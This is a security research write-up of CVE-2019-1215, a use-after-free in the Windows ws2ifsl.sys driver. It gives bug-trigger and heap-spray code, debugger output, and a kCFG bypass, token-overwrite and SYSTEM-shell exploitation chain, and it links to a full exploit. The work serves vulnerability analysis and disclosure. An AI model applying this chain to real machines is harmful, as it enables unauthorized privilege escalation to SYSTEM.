Introduction
The following blog post discusses a recently patched use-after-free vulnerability (CVE-2019-1215) in ws2ifsl.sys that can be used for local privilege escalation. The bug was present in Windows 7, Windows 8, Windows 10, Windows 2008, Windows 2012 and Windows 2019. It was patched on 10 September 2019. More information about it can be found here.
This post describes the root cause analysis and the exploitation on Windows 10 19H1 (1903) x64. The exploit shows how to bypass kASLR, kCFG and SMEP on this system.
Background about ws2ifsl
For a better understanding of this analysis, we first introduce some background information about the vulnerable driver. There is no public documentation about this driver, and most of the following information was obtained by reverse engineering. The ws2ifsl component is a driver related to Winsock (Windows Sockets).
The driver implements two objects:
- A process object
- A socket object
The driver implements several dispatch routines, which can be called by the user. When NtCreateFile is called with the filename set to \\Device\\WS2IFSL\\, the function DispatchCreate is reached. The function branches based on the string in _FILE_FULL_EA_INFORMATION.EaName. If it is NifsPvd, it calls CreateProcessFile; if it is NifsSct, it calls CreateSocketFile.
The functions CreateSocketFile and CreateProcessFile both create internal objects, which we call 'socketData' and 'procData' respectively. After creation, these objects are saved in the _FILE_OBJECT.FsContext of the file object, which was created in the dispatch routine.
The file object is the one that can be accessed from user mode with the handle returned from NtCreateFile. The handle can be used to perform calls to DeviceIoControl or WriteFile. This means that the 'procData' and 'socketData' objects are not directly reference counted with ObfReferenceObject and ObfDereferenceObject, but the underlying file object is.
The driver implements two Asynchronous Procedure Call (APC) objects, called 'request queue' and 'cancel queue'. An APC is a mechanism to asynchronously execute functions in another thread. Because multiple APCs can be queued for execution in the same thread, the kernel implements a queue that stores all the APCs to be executed.
The 'procData' object contains these two APC objects, which are initialized by CreateProcessFile in InitializeRequestQueue and InitializeCancelQueue. An APC object is initialized by KeInitializeApc, which receives a target thread and a function as arguments. Additionally, the processor mode (kernel or user mode) is set, as well as a rundown routine. In the case of ws2ifsl, the rundown routines are RequestRundownRoutine and CancelRundownRoutine, and the processor mode is set to user mode. These rundown routines are used for cleanup and are called by the kernel if the thread dies before the APC has a chance to execute inside the thread. This can happen because a user-mode APC is only delivered to a thread once that thread enters an alertable state. A thread enters an alertable state if, for example, SleepEx is called with the second argument set to TRUE.
The driver also implements a read and a write dispatch routine in DispatchReadWrite, which is only accessible for the socket object and calls DoSocketReadWrite. This function, among other things, is responsible for adding the APC elements to the APC queue by calling the function SignalRequest, which uses the nt!KeInsertQueueApc API function.
Communication with the driver
In many cases, a driver creates a symbolic link whose name can be used as a file name for CreateFileA, but this is not the case with ws2ifsl. It only calls nt!IoCreateDevice with the DeviceName set to '\Device\WS2IFSL'. However, by calling the native API NtOpenFile it is possible to reach the create dispatch function ws2ifsl!DispatchCreate. The following code can be used to accomplish this:
HANDLE fileHandle = 0;
UNICODE_STRING deviceName;
RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL");
OBJECT_ATTRIBUTES object;
InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
IO_STATUS_BLOCK IoStatusBlock;
NtOpenFile(&fileHandle, GENERIC_READ, &object, &IoStatusBlock, 0, 0);
The function DispatchCreate checks the extended attributes of the open call. These attributes can only be supplied through the NtCreateFile system call.
For the process object, the extended attribute (EA) data buffer must contain a thread handle belonging to the current process. If the call succeeds, we get a handle to the device, which we can use for further operations.
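As a rough illustration of the buffer that NtCreateFile expects, the following sketch builds a single extended-attribute entry in the documented FILE_FULL_EA_INFORMATION layout: a fixed header, the NUL-terminated name, then the value bytes. It uses fixed-width types so that it compiles without the Windows headers. The names EA_INFO and build_ea are hypothetical helpers and not part of the original exploit, and the layout of the value that ws2ifsl expects after the name is not reproduced here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Portable mirror of FILE_FULL_EA_INFORMATION; fixed-width types stand in
 * for ULONG/UCHAR/USHORT so the sketch builds without Windows headers. */
typedef struct {
    uint32_t NextEntryOffset; /* 0 for the last (here: only) entry */
    uint8_t  Flags;
    uint8_t  EaNameLength;    /* length of the name, excluding the NUL */
    uint16_t EaValueLength;   /* length of the value after the name */
    char     EaName[1];       /* name, NUL terminator, then the value */
} EA_INFO;

/* Hypothetical helper: builds one EA entry. The caller frees the result. */
EA_INFO *build_ea(const char *name, const void *value,
                  uint16_t value_len, size_t *total_len)
{
    size_t name_len = strlen(name);
    if (name_len > UINT8_MAX)
        return NULL;

    size_t size = offsetof(EA_INFO, EaName) + name_len + 1 + value_len;
    if (size < sizeof(EA_INFO))
        size = sizeof(EA_INFO);

    unsigned char *raw = calloc(1, size);
    if (raw == NULL)
        return NULL;

    EA_INFO *ea = (EA_INFO *)raw;
    ea->EaNameLength = (uint8_t)name_len;
    ea->EaValueLength = value_len;

    /* The name (with its NUL) starts at EaName; the value follows it. */
    unsigned char *name_dst = raw + offsetof(EA_INFO, EaName);
    memcpy(name_dst, name, name_len + 1);
    if (value_len != 0)
        memcpy(name_dst + name_len + 1, value, value_len);

    if (total_len != NULL)
        *total_len = size;
    return ea;
}
```

For the process object, the name would be "NifsPvd" and the value would begin with the thread handle; the resulting pointer and length would then be passed as the EaBuffer and EaLength arguments of NtCreateFile.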
Patch Analysis
Now that we have covered the background, we can switch to the patch analysis. It starts by comparing the unpatched version of ws2ifsl (10.0.18362.1) with the patched version (10.0.18362.356).
We can quickly see that only a couple of functions have been patched:
- CreateProcessFile
- DispatchClose
- SignalCancel
- SignalRequest
- RequestRundownRoutine
- CancelRundownRoutine
This can be seen in the following screenshot:
The patched version also contains a new function:
- DereferenceProcessContext
The most obvious change is that all patched functions now contain a call to the new function DereferenceProcessContext. This function can be seen in the following screenshot:
The next thing to notice is that the 'procData' object was extended by a new member and now uses a reference count. For example, in CreateProcessFile, which is responsible for all initializations, this new member is set to one.
procData->tag = 'corP';
*(_QWORD *)&procData->processId = PsGetCurrentProcessId();
procData->field_100 = 0;

vs

procData->tag = 'corP';
*(_QWORD *)&procData->processId = PsGetCurrentProcessId();
procData->dword100 = 0;
procData->referenceCounter = 1i64; // new
The function DereferenceProcessContext decrements the reference count and, depending on the result, either calls nt!ExFreePoolWithTag on the object or just returns.
The function DispatchClose, which is the close dispatch routine of the driver, is also patched. The new version replaces the call to nt!ExFreePoolWithTag with a call to DereferenceProcessContext. This means that if other references are still outstanding, the 'procData' object is not freed; only its reference count is decremented by one.
The fix in SignalRequest increments the referenceCounter before the call to nt!KeInsertQueueApc.
The bug is that DispatchClose can free the 'procData' object even if a request is already queued as an APC. DispatchClose is called whenever the last handle to the file object is closed (by calling CloseHandle). The patch fixes a use-after-free in which the rundown routine, among others, could access data that had already been freed.
The fix uses the new referenceCounter to make sure that the buffer is only freed after the last reference to it is dropped. The reference count is increased before calling nt!KeInsertQueueApc. The rundown routine, which holds a reference, drops it at the end of the function with DereferenceProcessContext. If nt!KeInsertQueueApc fails, the reference is also dropped (avoiding a memory leak).
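The reference-counting scheme introduced by the patch can be modeled in a few lines of portable C. This is only a simplified sketch of the logic described above, not the driver's code: ProcData, proc_create, signal_request and the other names are hypothetical stand-ins, a plain counter replaces whatever interlocked operations the driver uses, and the freed flag exists only so that the moment of the free can be observed.

```c
#include <stdbool.h>
#include <stdlib.h>

/* Simplified stand-in for 'procData'; only the counter matters here. */
typedef struct {
    long  reference_counter;
    bool *freed_flag; /* model-only: lets the caller observe the free */
} ProcData;

/* Models CreateProcessFile: the object starts with one reference. */
ProcData *proc_create(bool *freed_flag)
{
    ProcData *p = malloc(sizeof *p);
    if (p == NULL)
        return NULL;
    p->reference_counter = 1;
    p->freed_flag = freed_flag;
    *freed_flag = false;
    return p;
}

/* Models DereferenceProcessContext: free only on the last reference. */
void proc_dereference(ProcData *p)
{
    if (--p->reference_counter == 0) {
        *p->freed_flag = true;
        free(p);
    }
}

/* Models SignalRequest: take a reference before queueing the APC and
 * give it back if the insertion fails. */
bool signal_request(ProcData *p, bool insert_succeeds)
{
    p->reference_counter++;
    if (!insert_succeeds) {
        proc_dereference(p);
        return false;
    }
    return true;
}

/* Models the rundown routine dropping the reference held by the APC. */
void rundown_routine(ProcData *p) { proc_dereference(p); }

/* Models DispatchClose dropping the initial reference. */
void dispatch_close(ProcData *p) { proc_dereference(p); }
```

In this model, calling dispatch_close while an APC is queued leaves the object alive, and it is released only when rundown_routine drops the last reference. In the unpatched driver, the equivalent of dispatch_close freed the buffer unconditionally.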
Triggering the bug
To trigger the bug, all that is needed is to create a 'procData' handle and a 'socketData' handle, write some data to the 'socketData' handle and close both handles. The thread termination then calls the APC rundown routine, which works on the freed data. The following code would trigger the bug:
<..> in CreateProcessHandle:
    g_hThread1 = CreateThread(0, 0, ThreadMain1, 0, 0, 0);
    eaData->a1 = (void*)g_hThread1; // thread must be in current process
    eaData->a2 = (void*)0x2222222;  // fake APC Routine
    eaData->a3 = (void*)0x3333333;  // fake cancel Rundown Routine
    eaData->a4 = (void*)0x4444444;
    eaData->a5 = (void*)0x5555555;
    NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL,
                                   FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer,
                                   sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
    DWORD supSuc = SuspendThread(g_hThread1);

<..> in main:
    HANDLE procHandle = CreateProcessHandle();
    HANDLE sockHandle = CreateSocketHandle(procHandle);
    char* writeBuffer = (char*) malloc(0x100);
    IO_STATUS_BLOCK io;
    LARGE_INTEGER byteOffset;
    byteOffset.HighPart = 0;
    byteOffset.LowPart = 0;
    byteOffset.QuadPart = 0;
    byteOffset.u.LowPart = 0;
    byteOffset.u.HighPart = 0;
    ULONG key = 0;
    CloseHandle(procHandle);
    NTSTATUS ret = NtWriteFile(sockHandle, 0, 0, 0, &io, writeBuffer, 0x100, &byteOffset, &key);
We can verify this behavior by setting breakpoints at the free in DispatchClose and at RequestRundownRoutine:
Breakpoint 2 hit
ws2ifsl!DispatchClose+0x7d:
fffff806`1b8e71cd e8ceeef3fb      call    nt!ExFreePool (fffff806`178260a0)
1: kd> db rcx
ffffae0d`ceafbc70  50 72 6f 63 00 00 00 00-8c 07 00 00 00 00 00 00  Proc............
1: kd> g
Breakpoint 0 hit
ws2ifsl!RequestRundownRoutine:
fffff806`1b8e12d0 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> db rcx-30
ffffae0d`ceafbc70  50 72 6f 63 00 00 00 00-8c 07 00 00 00 00 00 00  Proc............
Because the 'procData' object is already freed, the rundown routine will work on freed data. In most cases, this will not crash because the data block is not reallocated.
Heap Spray
Now that we know how to trigger the bug, we can move on to exploitation. The first step is to reclaim the freed allocation.
To do this, we first need to know the size of the buffer and the pool on which it is allocated.
Using the !pool command on the buffer that is about to be freed, we can see that it is allocated on the Nonpaged pool and has a size of 0x120 bytes.
1: kd> !pool ffff8b08905e9910
Pool page ffff8b08905e9910 region is Nonpaged pool
<..>
*ffff8b08905e9900 size:  120 previous size:    0  (Allocated) *Ws2P Process: ffff8b08a32e3080
        Owning component : Unknown (update pooltag.txt)
It can be verified by looking at the allocation of the buffer in ws2ifsl!CreateProcessFile:
PAGE:00000001C00079ED    mov     edx, 108h       ; size
PAGE:00000001C00079F2    mov     ecx, 200h       ; PoolType
PAGE:00000001C00079F7    mov     r8d, 'P2sW'     ; Tag
PAGE:00000001C00079FD    call    cs:__imp_ExAllocatePoolWithQuotaTag
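The requested size of 0x108 bytes and the 0x120 bytes reported by !pool can be reconciled with a small calculation. The PoolType value 0x200 corresponds to NonPagedPoolNx in the WDK POOL_TYPE enumeration, which matches the Nonpaged pool region shown above. The sketch below assumes a 16-byte pool header and 16-byte allocation granularity on x64; both constants and the helper name pool_block_size are assumptions made for illustration.

```c
#include <stddef.h>

/* Assumptions for x64: a 16-byte pool header precedes each allocation
 * and block sizes are rounded up to a multiple of 16 bytes. */
#define POOL_HEADER_SIZE 0x10u
#define POOL_GRANULARITY 0x10u

/* Returns the pool block size (header included) for a requested size. */
size_t pool_block_size(size_t requested)
{
    size_t with_header = requested + POOL_HEADER_SIZE;
    return (with_header + POOL_GRANULARITY - 1)
           & ~(size_t)(POOL_GRANULARITY - 1);
}
```

Under these assumptions, pool_block_size(0x108) evaluates to 0x120: 0x108 plus the 0x10 header gives 0x118, which rounds up to 0x120. Any replacement allocation therefore has to end up in a block of the same size.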
A reliable way to perform controlled allocations of arbitrary size on the Nonpaged pool is to use named pipes. This technique was described by Alex Ionescu here. The following code can be used to allocate many 0x120-byte buffers with user-controlled data:
int doHeapSpray()
{
    for (size_t i = 0; i < 0x5000; i++)
    {
        HANDLE readPipe;
        HANDLE writePipe;
        DWORD resultLength;
        UCHAR payload[0x120 - 0x48];
        RtlFillMemory(payload, 0x120 - 0x48, 0x24);
        BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload));
        res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL);
    }
    return 0;
}
If we merge this heap spray into the code which triggers the bug, we get a bug check inside nt!KiInsertQueueApc. The crash happens due to a security violation on a linked list operation.
.text:00000001400A58F6    mov     rax, [rdx]
.text:00000001400A58F9    cmp     [rax+_LIST_ENTRY.Blink], rdx
.text:00000001400A58FD    jnz     fail_fast
<..>
.text:00000001401DC2EA fail_fast:          ; CODE XREF: KiInsertQueueApc+53↑j
.text:00000001401DC2EA                     ; KiInsertQueueApc+95↑j ...
.text:00000001401DC2EA    mov     ecx, 3
.text:00000001401DC2EF    int     29h      ; Win8: RtlFailFast(ecx)
The bugcheck happens right at the int 29h instruction. Inspecting the registers at the time of the crash, we can see that the RAX register points into our controlled user data.
rax=ffff8b08905e82d0 rbx=0000000000000000 rcx=0000000000000003
rdx=ffff8b08a39c3128 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8057489a2ef rsp=ffffde8268bfd4c8 rbp=ffffde8268bfd599
 r8=ffff8b08a39c3118  r9=fffff80574d87490 r10=fffff80574d87490
r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
0: kd> dq ffff8b08905e82d0
ffff8b08`905e82d0  24242424`24242424 24242424`24242424
ffff8b08`905e82e0  24242424`24242424 24242424`24242424
ffff8b08`905e82f0  24242424`24242424 24242424`24242424
ffff8b08`905e8300  24242424`24242424 24242424`24242424
ffff8b08`905e8310  24242424`24242424 24242424`24242424
ffff8b08`905e8320  24242424`24242424 24242424`24242424
ffff8b08`905e8330  24242424`24242424 24242424`24242424
ffff8b08`905e8340  24242424`24242424 24242424`24242424
The call stack leading to the crash is the following:
0: kd> k
 # Child-SP          RetAddr           Call Site
00 ffffb780`3ac7e868 fffff804`334a90c2 nt!DbgBreakPointWithStatus
01 ffffb780`3ac7e870 fffff804`334a87b2 nt!KiBugCheckDebugBreak+0x12
02 ffffb780`3ac7e8d0 fffff804`333c0dc7 nt!KeBugCheck2+0x952
03 ffffb780`3ac7efd0 fffff804`333d2ae9 nt!KeBugCheckEx+0x107
04 ffffb780`3ac7f010 fffff804`333d2f10 nt!KiBugCheckDispatch+0x69
05 ffffb780`3ac7f150 fffff804`333d12a5 nt!KiFastFailDispatch+0xd0
06 ffffb780`3ac7f330 fffff804`333dd2ef nt!KiRaiseSecurityCheckFailure+0x325
07 ffffb780`3ac7f4c8 fffff804`332cb84f nt!KiInsertQueueApc+0x136a87
08 ffffb780`3ac7f4d0 fffff804`3323ec58 nt!KiSchedulerApc+0x22f
09 ffffb780`3ac7f600 fffff804`333c5002 nt!KiDeliverApc+0x2e8
0a ffffb780`3ac7f6c0 fffff804`33804258 nt!KiApcInterrupt+0x2f2
0b ffffb780`3ac7f850 fffff804`333c867a nt!PspUserThreadStartup+0x48
0c ffffb780`3ac7f940 fffff804`333c85e0 nt!KiStartUserThread+0x2a
0d ffffb780`3ac7fa80 00007ff8`ed3ace50 nt!KiStartUserThreadReturn
0e 0000009e`93bffda8 00000000`00000000 ntdll!RtlUserThreadStart
The bugcheck is triggered when the main thread ends. At that point our corrupted APC is still inside the queue, and the unlink operation works on corrupted data. Because the forward and backward pointers are corrupted and do not point into a valid linked list, the safe unlinking check detects the corruption and bugchecks.
KeRundownApcQueues
To turn this into something useful, the code path that uses the freed APC element needs to change.
After the bug is triggered and the old 'procData' is overwritten, the thread for which the APC is queued needs to exit. When this happens, the kernel calls the function nt!KeRundownApcQueues, which bugchecks inside nt!KiFlushQueueApc, because it accesses the corrupted data.
However, this time we control the content of the buffer and can avoid the security exception, because the linked-list pointer is validated against a value pointing inside 'kthread'. Assuming we are running at medium integrity level, it is possible to leak the address of 'kthread' using a call to NtQuerySystemInformation with SystemHandleInformation. If we craft the reclaimed 'procData' with the 'kthread' address, the bugcheck is avoided and nt!KeRundownApcQueues tries to execute our user-controlled function pointer inside the 'procData' object.
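The linked-list consistency check behind the fail-fast, and the reason a pointer back into 'kthread' satisfies it, can be modeled in portable C. This is a simplified sketch of the safe-unlinking idea and not the kernel's code: ListEntry mirrors the layout of _LIST_ENTRY, while list_link_is_consistent and simulate_spray are hypothetical helpers introduced for illustration.

```c
#include <stdbool.h>
#include <string.h>

/* Same shape as the kernel's _LIST_ENTRY. */
typedef struct ListEntry {
    struct ListEntry *Flink;
    struct ListEntry *Blink;
} ListEntry;

void list_init(ListEntry *head)
{
    head->Flink = head;
    head->Blink = head;
}

void list_insert_tail(ListEntry *head, ListEntry *entry)
{
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

/* Mirrors the check in the disassembly: follow Flink, then require that
 * the neighbour's Blink points back at the entry being examined. */
bool list_link_is_consistent(const ListEntry *entry)
{
    return entry->Flink->Blink == entry;
}

/* Models the heap spray overwriting the reclaimed entry with 0x24. */
void simulate_spray(ListEntry *reclaimed)
{
    memset(reclaimed, 0x24, sizeof *reclaimed);
}
```

If the list head stands for the APC list inside 'kthread' and the entry for the one embedded in 'procData', the check on the head fails after simulate_spray, because the sprayed Blink no longer points back. Setting that Blink to the address of the head, which is the role of the leaked 'kthread' address, makes the check pass again.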
Bypassing kCFG
After we have control over what function pointer we want to execute, we have a little obstacle to overcome. KASLR is not an issue for this exploit, because it is possible to leak the ntoskrnl base address. With medium integrity level it is possible to leak the base address of all loaded modules via NtQuerySystemInformation / SystemModuleInformation. As a consequence, we now at least know where we could transfer our execution to.
However, the APC function pointer call is guarded by Microsoft's CFI implementation called Kernel Control Flow Guard. If we try to call any random Return Oriented Programming (ROP) gadget, the kernel would bail out with a bugcheck.
Fortunately, function prologues are all valid branch targets from the CFG perspective, so we know what we can call without being stopped. When the function pointer is called in nt!KeRundownApcQueues, the first argument (rcx) points into the 'procData' buffer and the second argument (rdx) is zero.
Another possibility is to have the APC function pointer called through the native function NtTestAlert. In that case, the first argument (rcx) points into the 'procData' buffer and the second argument (rdx) also points to it.
After a little while looking for small functions that do something interesting under the given constraints, we found one candidate: nt!SeSetAccessStateGenericMapping.
As can be seen in the following, nt!SeSetAccessStateGenericMapping can be used to perform an arbitrary write of 16 bytes.
Unfortunately, the second half of the 16 bytes is not fully controlled, but the first 8 bytes are based on the data provided by the heap spray.
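The shape of this write primitive can be sketched with a small model. It assumes that the function reads a pointer out of its first argument and copies the 16-byte GENERIC_MAPPING referenced by its second argument to a field behind that pointer. The structures below are deliberately simplified, the names are hypothetical, and the real kernel structures contain more members at other offsets.

```c
#include <stdint.h>

/* GENERIC_MAPPING consists of four 32-bit access masks (16 bytes). */
typedef struct {
    uint32_t GenericRead;
    uint32_t GenericWrite;
    uint32_t GenericExecute;
    uint32_t GenericAll;
} GenericMapping;

/* Simplified stand-in for the auxiliary access data structure. */
typedef struct {
    uint64_t       privileges_used; /* placeholder for the leading member */
    GenericMapping generic_mapping; /* destination of the 16-byte copy */
} AuxAccessData;

/* Simplified stand-in for the access state: only the pointer matters. */
typedef struct {
    AuxAccessData *aux_data;
} AccessState;

/* Model of the gadget: whoever controls 'state' chooses the destination,
 * whoever controls 'mapping' chooses the 16 bytes that are written. */
void set_access_state_generic_mapping(AccessState *state,
                                      const GenericMapping *mapping)
{
    state->aux_data->generic_mapping = *mapping;
}
```

Because the first argument points into the sprayed 'procData' buffer, the attacker chooses the pointer that plays the role of aux_data here, and with it the destination address. The source bytes come from the second argument, which is why only part of the written data is controlled.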
Token Overwrite
Once we have a powerful arbitrary write primitive, there are many things we could do. There are a lot of techniques to turn an arbitrary write into a full kernel read/write primitive on old Windows versions. On more recent versions of Windows 10, many of those techniques have been mitigated. One technique that still works is the token overwrite technique. It was first published in Cesar Cerrudo's "Easy local Windows Kernel Exploitation" publication in 2012, and we already made use of it in the past. The idea is to corrupt the _SEP_TOKEN_PRIVILEGES object located inside a _TOKEN object. The easiest way to do this is to overwrite the Present and Enabled members of this structure with all bits enabled. This will grant us SeDebugPrivilege, which will allow us to inject code into highly privileged processes such as 'winlogon.exe'.
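The effect of the overwrite can be illustrated with a small model of the privilege bitmaps. The sketch assumes that _SEP_TOKEN_PRIVILEGES consists of three 64-bit bitmaps (Present, Enabled, EnabledByDefault) and that each privilege is represented by the bit whose index equals its LUID, with SeDebugPrivilege being number 20. The helper names are hypothetical, and nothing here touches a real token.

```c
#include <stdbool.h>
#include <stdint.h>

/* Simplified model of _SEP_TOKEN_PRIVILEGES: three 64-bit bitmaps. */
typedef struct {
    uint64_t Present;
    uint64_t Enabled;
    uint64_t EnabledByDefault;
} SepTokenPrivileges;

#define SE_DEBUG_PRIVILEGE 20u /* LUID of SeDebugPrivilege */

/* A privilege is usable when its bit is both present and enabled. */
bool privilege_enabled(const SepTokenPrivileges *p, unsigned luid)
{
    uint64_t bit = (uint64_t)1 << luid;
    return (p->Present & bit) != 0 && (p->Enabled & bit) != 0;
}

/* Models the 16-byte write that covers Present and Enabled. */
void overwrite_privileges(SepTokenPrivileges *p)
{
    p->Present = UINT64_MAX;
    p->Enabled = UINT64_MAX;
}
```

The two overwritten members are adjacent and together span 16 bytes, which is the size of the write primitive. EnabledByDefault is left untouched in this model.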
We need to trigger the bug two times to reliably overwrite the token structure with 16 bytes. However this didn't seem to cause any trouble.
Getting System Privileges
Once we have injected code into a system process, it is basically game over. We can now, for example, run "cmd.exe" to provide us with an interactive command shell. We also avoid any further issues with kCFG and SMEP, because we do not perform ROP or execute any ring 0 code in the wrong context.
Exploit
The final exploit targets Windows 10 19H1 x64 and can be found at https://github.com/bluefrostsecurity/CVE-2019-1215. When the exploit is executed with medium integrity privileges, successful exploitation spawns a new cmd.exe with system privileges.